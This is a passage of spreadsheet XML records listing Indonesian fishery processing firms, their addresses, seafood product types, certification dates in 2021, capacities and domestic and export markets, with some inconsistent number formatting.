    <s v="China, Hong Kong, Italy, Japan, Korea, Democratic People's Republic of, Portugal, Singapore, Spain, United States"/>
  </r>
  <r>
    <n v="24780"/>
    <x v="1085"/>
    <s v="PT, INDOMAGURO TUNAS UNGGUL"/>
    <s v="Jl, Muara Baru Ujung Blok G1-2, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Beku"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="57398"/>
    <m/>
    <s v="China, Hong Kong, Italy, Japan, Korea, Democratic People's Republic of, Portugal, Singapore, Spain, United States"/>
  </r>
  <r>
    <n v="24781"/>
    <x v="1085"/>
    <s v="PT. INDOMAGURO TUNAS UNGGUL"/>
    <s v="Jl. Muara Baru Ujung Blok G1-2, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Telur Ikan Segar"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="China, Hong Kong, Italy, Japan, Korea, Democratic People's Republic of, Portugal, Singapore, Spain, United States"/>
  </r>
  <r>
    <n v="24782"/>
    <x v="1085"/>
    <s v="PT. INDOMAGURO TUNAS UNGGUL"/>
    <s v="Jl. Muara Baru Ujung Blok G1-2, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Telur Ikan Beku"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="China, Hong Kong, Italy, Japan, Korea, Democratic People's Republic of, Portugal, Singapore, Spain, United States"/>
  </r>
  <r>
    <n v="24783"/>
    <x v="1085"/>
    <s v="PT. INDOMAGURO TUNAS UNGGUL"/>
    <s v="Jl. Muara Baru Ujung Blok G1-2, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Bulu Babi Segar"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="China, Hong Kong, Italy, Japan, Korea, Democratic People's Republic of, Portugal, Singapore, Spain, United States"/>
  </r>
  <r>
    <n v="24784"/>
    <x v="1085"/>
    <s v="PT. INDOMAGURO TUNAS UNGGUL"/>
    <s v="Jl. Muara Baru Ujung Blok G1-2, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Bulu Babi Beku"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="China, Hong Kong, Italy, Japan, Korea, Democratic People's Republic of, Portugal, Singapore, Spain, United States"/>
  </r>
  <r>
    <n v="24785"/>
    <x v="1086"/>
    <s v="CV. CAHAYA KARYA INDAH"/>
    <s v="Kawasan Industri Millenium, Jl. Millenium Blok 22 Blok R5 No.3 (Room C6 &amp; C7), Kel. Kadu Agung, Kec. Tigaraksa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Salmon Segar, Trout Segar"/>
    <d v="2021-04-26T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Selatan, Kota Yogyakarta, Kota Surabaya, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="24786"/>
    <x v="1086"/>
    <s v="CV. CAHAYA KARYA INDAH"/>
    <s v="Kawasan Industri Millenium, Jl. Millenium Blok 22 Blok R5 No.3 (Room C6 &amp; C7), Kel. Kadu Agung, Kec. Tigaraksa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2021-04-26T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Jakarta Selatan, Kota Yogyakarta, Kota Surabaya, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="24787"/>
    <x v="1086"/>
    <s v="CV. CAHAYA KARYA INDAH"/>
    <s v="Kawasan Industri Millenium, Jl. Millenium Blok 22 Blok R5 No.3 (Room C6 &amp; C7), Kel. Kadu Agung, Kec. Tigaraksa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kerang Segar"/>
    <d v="2021-04-26T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Yogyakarta, Kota Surabaya, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="24788"/>
    <x v="1086"/>
    <s v="CV. CAHAYA KARYA INDAH"/>
    <s v="Kawasan Industri Millenium, Jl. Millenium Blok 22 Blok R5 No.3 (Room C6 &amp; C7), Kel. Kadu Agung, Kec. Tigaraksa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kerang Beku"/>
    <d v="2021-04-26T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Jakarta Selatan, Kota Yogyakarta, Kota Surabaya, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="24789"/>
    <x v="1086"/>
    <s v="CV. CAHAYA KARYA INDAH"/>
    <s v="Kawasan Industri Millenium, Jl. Millenium Blok 22 Blok R5 No.3 (Room C6 &amp; C7), Kel. Kadu Agung, Kec. Tigaraksa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopod Beku (Cumi-Cumi)"/>
    <d v="2021-04-26T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Jakarta Selatan, Kota Yogyakarta, Kota Surabaya, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="24790"/>
    <x v="1086"/>
    <s v="CV. CAHAYA KARYA INDAH"/>
    <s v="Kawasan Industri Millenium, Jl. Millenium Blok 22 Blok R5 No.3 (Room C6 &amp; C7), Kel. Kadu Agung, Kec. Tigaraksa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kepiting Beku"/>
    <d v="2021-04-26T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Yogyakarta, Kota Surabaya, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="24791"/>
    <x v="1086"/>
    <s v="CV. CAHAYA KARYA INDAH"/>
    <s v="Kawasan Industri Millenium, Jl. Millenium Blok 22 Blok R5 No.3 (Room C6 &amp; C7), Kel. Kadu Agung, Kec. Tigaraksa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Segar (Cumi-cumi)"/>
    <d v="2021-04-26T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Yogyakarta, Kota Surabaya, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="24792"/>
    <x v="1085"/>
    <s v="PT, INDOMAGURO TUNAS UNGGUL"/>
    <s v="Jl, Muara Baru Ujung Blok G1-2, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Segar"/>
    <d v="2021-05-06T00:00:00"/>
    <s v="165,254,26"/>
    <m/>
    <s v="China, Hong Kong, Italy, Japan, Korea, Democratic People's Republic of, Portugal, Singapore, Spain, United States"/>
  </r>
  <r>
    <n v="24793"/>
    <x v="1085"/>
    <s v="PT, INDOMAGURO TUNAS UNGGUL"/>
    <s v="Jl, Muara Baru Ujung Blok G1-2, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Beku"/>
    <d v="2021-05-06T00:00:00"/>
    <s v="253,919,76"/>
    <m/>
    <s v="China, Hong Kong, Italy, Japan, Korea, Democratic People's Republic of, Portugal, Singapore, Spain, United States"/>
  </r>
  <r>
    <n v="24805"/>
    <x v="1085"/>
    <s v="PT. INDOMAGURO TUNAS UNGGUL"/>
    <s v="Jl. Muara Baru Ujung Blok G1-2, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="China, Hong Kong, Italy, Japan, Korea, Democratic People's Republic of, Portugal, Singapore, Spain, United States"/>
  </r>
  <r>
    <n v="24806"/>
    <x v="1085"/>
    <s v="PT, INDOMAGURO TUNAS UNGGUL"/>
    <s v="Jl, Muara Baru Ujung Blok G1-2, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="20080"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="24807"/>
    <x v="1085"/>
    <s v="PT. INDOMAGURO TUNAS UNGGUL"/>
    <s v="Jl. Muara Baru Ujung Blok G1-2, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Segar"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="China, Hong Kong, Italy, Japan, Korea, Democratic People's Republic of, Portugal, Singapore, Spain, United States"/>
  </r>
  <r>
    <n v="24808"/>
    <x v="1085"/>
    <s v="PT, INDOMAGURO TUNAS UNGGUL"/>
    <s v="Jl, Muara Baru Ujung Blok G1-2, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2021-05-06T00:00:00"/>
    <s v="66,209,50"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="24809"/>
    <x v="1085"/>
    <s v="PT, INDOMAGURO TUNAS UNGGUL"/>
    <s v="Jl, Muara Baru Ujung Blok G1-2, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Segar (Mata Goyang, Lencam, Sebelah, Kerapu, Kakatua, Bawal, Selar, Kakap, Ayam-ayam, Kaci-kaci, Kurisi, Seabass, Barramundi)"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="707.6"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="24811"/>
    <x v="1085"/>
    <s v="PT, INDOMAGURO TUNAS UNGGUL"/>
    <s v="Jl, Muara Baru Ujung Blok G1-2, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Mata Besar, Lencam, Sebelah, Kerapu, Kakatua, Bawal, Selar, Kakap, Ayam-ayam, Kaci-kaci, Kurisi, Seabass, Barramundi)"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="193.7"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="24812"/>
    <x v="1085"/>
    <s v="PT, INDOMAGURO TUNAS UNGGUL"/>
    <s v="Jl, Muara Baru Ujung Blok G1-2, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Segar (Teri, Bonito, Pisang-pisang, Kuwe, Kembung, Makerel, Lemadang, Gindara, Sauri Pasifik, Tenggiri, Todak, Makerel Atlantik)"/>
    <d v="2021-05-06T00:00:00"/>
    <s v="14/01/1900  23,42,00"/>
    <m/>
    <s v="Italy, Japan, Korea, Democratic People's Republic of, Portugal"/>
  </r>
  <r>
    <n v="24813"/>
    <x v="1085"/>
    <s v="PT, INDOMAGURO TUNAS UNGGUL"/>
    <s v="Jl, Muara Baru Ujung Blok G1-2, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Teri, Bonito, Pisang-pisang, Kuwe, Kembung, Makerel, Lemadang, Gindara, Sauri Pasifik, Tenggiri, Todak, Makerel Atlantik)"/>
    <d v="2021-05-06T00:00:00"/>
    <s v="2,934,032,42"/>
    <m/>
    <s v="Italy, Japan, Korea, Democratic People's Republic of, Portugal"/>
  </r>
  <r>
    <n v="24814"/>
    <x v="1085"/>
    <s v="PT. INDOMAGURO TUNAS UNGGUL"/>
    <s v="Jl. Muara Baru Ujung Blok G1-2, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Kipas Segar"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="China, Hong Kong, Italy, Japan, Korea, Democratic People's Republic of, Portugal, Singapore, Spain, United States"/>
  </r>
  <r>
    <n v="24815"/>
    <x v="1085"/>
    <s v="PT. INDOMAGURO TUNAS UNGGUL"/>
    <s v="Jl. Muara Baru Ujung Blok G1-2, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Kipas Beku"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="China, Hong Kong, Italy, Japan, Korea, Democratic People's Republic of, Portugal, Singapore, Spain, United States"/>
  </r>
  <r>
    <n v="24816"/>
    <x v="1087"/>
    <s v="PERUM PERIKANAN INDONESIA UNIT SIMEULUE"/>
    <s v="Jl. Letkol Ali Hasan TPI, Kel. Lugu, Kec. Simeulue Timur, Kabupaten Simeulue&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Ikan Pelagis Beku (Tongkol, Deho, Selayang)"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Medan"/>
    <m/>
  </r>
  <r>
    <n v="24817"/>
    <x v="1087"/>
    <s v="PERUM PERIKANAN INDONESIA UNIT SIMEULUE"/>
    <s v="Jl. Letkol Ali Hasan TPI, Kel. Lugu, Kec. Simeulue Timur, Kabupaten Simeulue&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Ikan Pelagis Segar (Tongkol, Deho, Selayang)"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Medan"/>
    <m/>
  </r>
  <r>
    <n v="24818"/>
    <x v="1087"/>
    <s v="PERUM PERIKANAN INDONESIA UNIT SIMEULUE"/>
    <s v="Jl. Letkol Ali Hasan TPI, Kel. Lugu, Kec. Simeulue Timur, Kabupaten Simeulue&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Ikan Demersal Beku (Kerapu, Kakatua, Kakap)"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="24819"/>
    <x v="1087"/>
    <s v="PERUM PERIKANAN INDONESIA UNIT SIMEULUE"/>
    <s v="Jl. Letkol Ali Hasan TPI, Kel. Lugu, Kec. Simeulue Timur, Kabupaten Simeulue&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Ikan Demersal Segar (Kerapu, Kakatua, Kakap)"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="24820"/>
    <x v="1087"/>
    <s v="PERUM PERIKANAN INDONESIA UNIT SIMEULUE"/>
    <s v="Jl. Letkol Ali Hasan TPI, Kel. Lugu, Kec. Simeulue Timur, Kabupaten Simeulue&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Cephalopoda Beku (Gurita, Cumi-cumi)"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="24821"/>
    <x v="1088"/>
    <s v="GOMBARA"/>
    <s v=" Jl. KHA Jabbar Ashiry No.1, Kel. Pai, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Naget Ikan, Otak-otak Ikan) "/>
    <d v="2021-04-30T00:00:00"/>
    <n v="4400"/>
    <s v="Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="24825"/>
    <x v="691"/>
    <s v="PT. SAMUDRA MANDIRI SENTOSA"/>
    <s v="Jl. Wolter Mongisidi Km 5, Kel. Wangurer, Kec. Madidir, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Kaleng"/>
    <d v="2021-05-31T00:00:00"/>
    <n v="3444004"/>
    <s v="Kota Jakarta Utara, Kota Surabaya, Kota Pontianak, Kota Manado, Kota Bitung, Kota Tomohon"/>
    <s v="Australia, United States"/>
  </r>
  <r>
    <n v="24827"/>
    <x v="691"/>
    <s v="PT, SAMUDRA MANDIRI SENTOSA"/>
    <s v="Jl, Wolter Mongisidi Km 5, Kel, Wangurer, Kec, Madidir, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Pouch"/>
    <d v="2021-05-31T00:00:00"/>
    <n v="177684"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="United Kingdom"/>
  </r>
  <r>
    <n v="24828"/>
    <x v="691"/>
    <s v="PT, SAMUDRA MANDIRI SENTOSA"/>
    <s v="Jl, Wolter Mongisidi Km 5, Kel, Wangurer, Kec, Madidir, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Asap Kering"/>
    <d v="2021-05-31T00:00:00"/>
    <n v="2887360.18"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="24829"/>
    <x v="691"/>
    <s v="PT. SAMUDRA MANDIRI SENTOSA"/>
    <s v="Jl. Wolter Mongisidi Km 5, Kel. Wangurer, Kec. Madidir, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Loin Masak Beku"/>
    <d v="2021-05-31T00:00:00"/>
    <n v="1676115"/>
    <s v="Kota Pasuruan, Kota Bitung"/>
    <s v="Spain, Thailand"/>
  </r>
  <r>
    <n v="24830"/>
    <x v="1089"/>
    <s v="PT. SAMUDERA LAWRENCE"/>
    <s v="Jl. Raya Perancis No.2 Room 1 Komplek Pergudangan Kosambi Permai Blok E No.40, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Pelagis Beku (Panni, Tongkol, Kawabida, Salem)"/>
    <d v="2021-04-20T00:00:00"/>
    <n v="100000"/>
    <s v="Kabupaten Tangerang"/>
    <s v="China"/>
  </r>
  <r>
    <n v="24831"/>
    <x v="1089"/>
    <s v="PT. SAMUDERA LAWRENCE"/>
    <s v="Jl. Raya Perancis No.2 Room 1 Komplek Pergudangan Kosambi Permai Blok E No.40, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Demersal Beku (Kakap, Kerapu)"/>
    <d v="2021-04-20T00:00:00"/>
    <n v="100000"/>
    <s v="Kabupaten Tangerang"/>
    <s v="China"/>
  </r>
  <r>
    <n v="24832"/>
    <x v="1089"/>
    <s v="PT. SAMUDERA LAWRENCE"/>
    <s v="Jl. Raya Perancis No.2 Room 1 Komplek Pergudangan Kosambi Permai Blok E No.40, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2021-04-20T00:00:00"/>
    <n v="100000"/>
    <s v="Kabupaten Tangerang"/>
    <s v="China"/>
  </r>
  <r>
    <n v="24833"/>
    <x v="1089"/>
    <s v="PT. SAMUDERA LAWRENCE"/>
    <s v="Jl. Raya Perancis No.2 Room 1 Komplek Pergudangan Kosambi Permai Blok E No.40, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Daging Tuna Beku"/>
    <d v="2021-04-20T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="24835"/>
    <x v="1090"/>
    <s v="CV. DSA BUANA KALIMANTAN"/>
    <s v="Jl. Banjar No.66 RT 27, Kel. Manggar Baru, Kec. Balikpapan Timur, Kota Balikpapan&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Ikan Pelagis Segar (Kuwe, Tenggiri)"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="24311"/>
    <s v="Kota Jakarta Barat"/>
    <s v="Hong Kong, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="24836"/>
    <x v="691"/>
    <s v="PT. SAMUDRA MANDIRI SENTOSA"/>
    <s v="Jl. Wolter Mongisidi Km 5, Kel. Wangurer, Kec. Madidir, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tepung Ikan"/>
    <d v="2021-05-31T00:00:00"/>
    <n v="1294550"/>
    <s v="Kota Medan, Kota Jakarta Barat, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="24838"/>
    <x v="1091"/>
    <s v="PT. PIALA SEAFOOD INDONESIA"/>
    <s v="Kampung Tapiri, Kel. Kaibus, Kec. Teminabuan, Kabupaten Sorong Selatan&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Udang Beku"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Surabaya"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="24840"/>
    <x v="241"/>
    <s v="PT, NUANSA CIPTA MAGELLO"/>
    <s v="Jl, Kima III Kav 5 AB, Kel, Daya, Kec, Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Daging Rajungan Pasteurisasi Kaleng"/>
    <d v="2021-05-03T00:00:00"/>
    <n v="14943047"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="24841"/>
    <x v="1092"/>
    <s v="UD. SUMBER WINDU"/>
    <s v="Jl. Cakalang Kompleks Pelabuhan Perikanan Pantai Sorong, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Udang Beku"/>
    <d v="2021-03-23T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="24842"/>
    <x v="1093"/>
    <s v="PT. INTI PERSADA BAHARI BARU"/>
    <s v="Jl. Dr. Makaliwe 1 No. 17 RT 011 RW 08, Kel. Grogol, Kec. Grogol Petamburan, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="30000"/>
    <s v="Kabupaten Belitung, Kota Batam"/>
    <s v="Australia, China, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, United Kingdom, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24843"/>
    <x v="1093"/>
    <s v="PT. INTI PERSADA BAHARI BARU"/>
    <s v="Jl. Dr. Makaliwe 1 No. 17 RT 011 RW 08, Kel. Grogol, Kec. Grogol Petamburan, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Kakap Putih, Malong, Layur, Lemadang, Kakatua, Kakap Merah)"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="10000"/>
    <s v="Kabupaten Belitung, Kota Batam"/>
    <s v="Australia, China, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, United Kingdom, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24844"/>
    <x v="1093"/>
    <s v="PT. INTI PERSADA BAHARI BARU"/>
    <s v="Jl. Dr. Makaliwe 1 No. 17 RT 011 RW 08, Kel. Grogol, Kec. Grogol Petamburan, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Meka, Gindara, Tenggiri)"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="10000"/>
    <s v="Kabupaten Belitung, Kota Batam"/>
    <m/>
  </r>
  <r>
    <n v="24845"/>
    <x v="1093"/>
    <s v="PT. INTI PERSADA BAHARI BARU"/>
    <s v="Jl. Dr. Makaliwe 1 No. 17 RT 011 RW 08, Kel. Grogol, Kec. Grogol Petamburan, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Beku"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="10000"/>
    <s v="Kabupaten Belitung, Kota Batam"/>
    <m/>
  </r>
  <r>
    <n v="24846"/>
    <x v="1093"/>
    <s v="PT. INTI PERSADA BAHARI BARU"/>
    <s v="Jl. Dr. Makaliwe 1 No.17 RT 011 RW 08, Kel. Grogol, Kec. Grogol Petamburan, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Fillet Ikan Pelagis Beku"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="10000"/>
    <s v="Kabupaten Bangka, Kabupaten Belitung"/>
    <s v="Australia, China, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, United Kingdom, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24847"/>
    <x v="1093"/>
    <s v="PT. INTI PERSADA BAHARI BARU"/>
    <s v="Jl. Dr. Makaliwe 1 No. 17 RT 011 RW 08, Kel. Grogol, Kec. Grogol Petamburan, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Fillet Ikan Demersal Beku"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="10000"/>
    <s v="Kabupaten Belitung, Kota Batam"/>
    <m/>
  </r>
  <r>
    <n v="24848"/>
    <x v="81"/>
    <s v="PT. DSINDO ABADI INTERNASIONAL"/>
    <s v="Jl. Raya Perancis Pergudangan 75 Blok F No.6A, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Kembung, Marlin, Cakalang, Tenggiri, Pedang)"/>
    <d v="2021-04-23T00:00:00"/>
    <n v="120000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="24849"/>
    <x v="81"/>
    <s v="PT. DSINDO ABADI INTERNASIONAL"/>
    <s v="Jl. Raya Perancis Pergudangan 75 Blok F No.6A, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Bandeng Beku"/>
    <d v="2021-04-23T00:00:00"/>
    <n v="60000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="24850"/>
    <x v="81"/>
    <s v="PT. DSINDO ABADI INTERNASIONAL"/>
    <s v="Jl. Raya Perancis Pergudangan 75 Blok F No.6A, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Kipas Beku"/>
    <d v="2021-04-23T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="24851"/>
    <x v="1094"/>
    <s v="PT. SUMBERGUNA MAKASARNUSA"/>
    <s v="Jl. Ujung Pandang Baru No.17, Kel. La'latang, Kec. Tallo, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-04-22T00:00:00"/>
    <n v="1000000"/>
    <m/>
    <s v="Chile, China, France, Spain"/>
  </r>
  <r>
    <n v="24852"/>
    <x v="1095"/>
    <s v="PT, SUTRACO NUSANTARA MEGAH"/>
    <s v="Pergudangan Legundi Business Park D 19A, Kel, Banjaran, Kec, Driyorejo, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-04-20T00:00:00"/>
    <n v="3525000"/>
    <s v="Kabupaten Pasuruan"/>
    <s v="China, India, Japan, Korea, Republic of"/>
  </r>
  <r>
    <n v="24853"/>
    <x v="131"/>
    <s v="PT. BANDAR BAHARI SUKSES"/>
    <s v="Gudang Alat Perikanan Blok D No.3, Jl. Dermaga Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-05-24T00:00:00"/>
    <n v="1000000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24854"/>
    <x v="131"/>
    <s v="PT. BANDAR BAHARI SUKSES"/>
    <s v="Gudang Alat Perikanan Blok D No.3, Jl. Dermaga Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Barakuda, Kembung, Muroaji, Cakalang, Tenggiri, Salem)"/>
    <d v="2021-05-24T00:00:00"/>
    <n v="1000000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24855"/>
    <x v="131"/>
    <s v="PT. BANDAR BAHARI SUKSES"/>
